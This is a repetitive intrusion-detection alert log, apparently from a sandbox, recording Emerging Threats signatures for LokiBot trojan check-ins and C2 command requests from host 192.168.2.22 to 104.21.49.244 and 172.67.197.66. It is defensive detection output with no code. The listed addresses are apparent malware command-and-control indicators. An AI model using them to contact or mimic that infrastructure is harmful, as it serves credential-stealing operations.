                    02/10/22-10:22:23.504559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22104.21.49.244
                    02/10/22-10:22:23.504559TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22104.21.49.244
                    02/10/22-10:22:23.504559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22104.21.49.244
                    02/10/22-10:22:24.588293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22104.21.49.244
                    02/10/22-10:22:24.588293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22104.21.49.244
                    02/10/22-10:22:24.588293TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22104.21.49.244
                    02/10/22-10:22:24.588293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22104.21.49.244
                    02/10/22-10:22:25.593017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22172.67.197.66
                    02/10/22-10:22:25.593017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22172.67.197.66
                    02/10/22-10:22:25.593017TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22172.67.197.66
                    02/10/22-10:22:25.593017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22172.67.197.66
                    02/10/22-10:22:26.671475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22172.67.197.66
                    02/10/22-10:22:26.671475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22172.67.197.66
                    02/10/22-10:22:26.671475TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22172.67.197.66
                    02/10/22-10:22:26.671475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22172.67.197.66
                    02/10/22-10:22:27.690157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22172.67.197.66
                    02/10/22-10:22:27.690157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22172.67.197.66
                    02/10/22-10:22:27.690157TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22172.67.197.66
                    02/10/22-10:22:27.690157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22172.67.197.66
                    02/10/22-10:22:29.085941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22172.67.197.66
                    02/10/22-10:22:29.085941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22172.67.197.66
                    02/10/22-10:22:29.085941TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22172.67.197.66
                    02/10/22-10:22:29.085941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22172.67.197.66
                    02/10/22-10:22:30.799655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22172.67.197.66
                    02/10/22-10:22:30.799655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22172.67.197.66
                    02/10/22-10:22:30.799655TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22172.67.197.66
                    02/10/22-10:22:30.799655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22172.67.197.66
                    02/10/22-10:22:31.879954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22172.67.197.66
                    02/10/22-10:22:31.879954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22172.67.197.66
                    02/10/22-10:22:31.879954TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22172.67.197.66
                    02/10/22-10:22:31.879954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22172.67.197.66
                    02/10/22-10:22:32.951127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22172.67.197.66
                    02/10/22-10:22:32.951127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22172.67.197.66
                    02/10/22-10:22:32.951127TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22172.67.197.66
                    02/10/22-10:22:32.951127TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22172.67.197.66
                    02/10/22-10:22:34.006464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22172.67.197.66
                    02/10/22-10:22:34.006464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22172.67.197.66
                    02/10/22-10:22:34.006464TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22172.67.197.66
                    02/10/22-10:22:34.006464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22172.67.197.66
                    02/10/22-10:22:35.055713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22172.67.197.66
                    02/10/22-10:22:35.055713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22172.67.197.66
                    02/10/22-10:22:35.055713TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22172.67.197.66
                    02/10/22-10:22:35.055713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22172.67.197.66
                    02/10/22-10:22:36.072598TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22172.67.197.66
                    02/10/22-10:22:36.072598TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22172.67.197.66
                    02/10/22-10:22:36.072598TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22172.67.197.66
                    02/10/22-10:22:36.072598TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22172.67.197.66
                    02/10/22-10:22:37.120242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22172.67.197.66
                    02/10/22-10:22:37.120242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22172.67.197.66
                    02/10/22-10:22:37.120242TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22172.67.197.66
                    02/10/22-10:22:37.120242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22172.67.197.66
                    02/10/22-10:22:38.172977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22172.67.197.66
                    02/10/22-10:22:39.224650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22172.67.197.66
                    02/10/22-10:22:40.420565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22104.21.49.244
                    02/10/22-10:22:40.420565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22104.21.49.244
                    02/10/22-10:22:40.420565TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22104.21.49.244
                    02/10/22-10:22:40.420565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22104.21.49.244
                    02/10/22-10:22:41.439397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22104.21.49.244
                    02/10/22-10:22:42.534000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22172.67.197.66
                    02/10/22-10:22:42.534000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22172.67.197.66
                    02/10/22-10:22:42.534000TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22172.67.197.66
                    02/10/22-10:22:42.534000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22172.67.197.66
                    02/10/22-10:22:43.544900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22172.67.197.66
                    02/10/22-10:22:44.584138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22172.67.197.66
                    02/10/22-10:22:45.641461TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22104.21.49.244
                    02/10/22-10:22:45.641461TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22104.21.49.244
                    02/10/22-10:22:45.641461TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22104.21.49.244
                    02/10/22-10:22:45.641461TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22104.21.49.244
                    02/10/22-10:22:46.729666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22172.67.197.66
                    02/10/22-10:22:46.729666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22172.67.197.66
                    02/10/22-10:22:46.729666TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22172.67.197.66
                    02/10/22-10:22:46.729666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22172.67.197.66
                    02/10/22-10:22:47.737186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22172.67.197.66
                    02/10/22-10:22:48.837397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22172.67.197.66
                    02/10/22-10:22:49.900199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22172.67.197.66
                    02/10/22-10:22:51.041533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22172.67.197.66
                    02/10/22-10:22:52.063120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22104.21.49.244
                    02/10/22-10:22:52.063120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22104.21.49.244
                    02/10/22-10:22:52.063120TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22104.21.49.244
                    02/10/22-10:22:52.063120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22104.21.49.244
                    02/10/22-10:22:53.153615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22172.67.197.66
                    02/10/22-10:22:53.153615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22172.67.197.66
                    02/10/22-10:22:53.153615TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22172.67.197.66
                    02/10/22-10:22:53.153615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22172.67.197.66
                    02/10/22-10:23:03.670597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22104.21.49.244
                    02/10/22-10:23:03.670597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22104.21.49.244
                    02/10/22-10:23:03.670597TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22104.21.49.244
                    02/10/22-10:23:03.670597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22104.21.49.244
                    02/10/22-10:23:05.954620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22172.67.197.66
                    02/10/22-10:23:05.954620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22172.67.197.66
                    02/10/22-10:23:05.954620TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22172.67.197.66
                    02/10/22-10:23:05.954620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22172.67.197.66
                    02/10/22-10:23:14.928309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22104.21.49.244
                    02/10/22-10:23:14.928309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22104.21.49.244
                    02/10/22-10:23:14.928309TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22104.21.49.244
                    02/10/22-10:23:14.928309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22104.21.49.244
                    02/10/22-10:23:16.169339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22172.67.197.66
                    02/10/22-10:23:16.169339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22172.67.197.66
                    02/10/22-10:23:16.169339TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22172.67.197.66
                    02/10/22-10:23:16.169339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22172.67.197.66
                    02/10/22-10:23:17.425743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22104.21.49.244
                    02/10/22-10:23:17.425743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22104.21.49.244
                    02/10/22-10:23:17.425743TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22104.21.49.244
                    02/10/22-10:23:17.425743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22104.21.49.244
                    02/10/22-10:23:19.840840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22172.67.197.66
                    02/10/22-10:23:19.840840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22172.67.197.66
                    02/10/22-10:23:19.840840TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22172.67.197.66
                    02/10/22-10:23:19.840840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22172.67.197.66
                    02/10/22-10:23:26.759435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22104.21.49.244
                    02/10/22-10:23:26.759435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22104.21.49.244
                    02/10/22-10:23:26.759435TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22104.21.49.244
                    02/10/22-10:23:26.759435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22104.21.49.244
                    02/10/22-10:23:28.801702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22172.67.197.66
                    02/10/22-10:23:28.801702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22172.67.197.66
                    02/10/22-10:23:28.801702TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22172.67.197.66
                    02/10/22-10:23:28.801702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22172.67.197.66
